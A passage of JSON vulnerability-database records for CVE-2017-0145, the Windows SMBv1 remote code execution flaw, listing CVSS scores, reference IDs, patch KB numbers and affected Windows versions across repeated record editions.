"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T08:48:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T08:48:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4014077", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T08:48:00", "differentElements": ["msAffectedSoftware"], "edition": 29}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T11:22:34", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4014077", "KB4012598", "KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T11:22:34", "differentElements": ["msAffectedSoftware"], "edition": 30}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T12:52:00", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4014077", "KB4012598", "KB4012606", 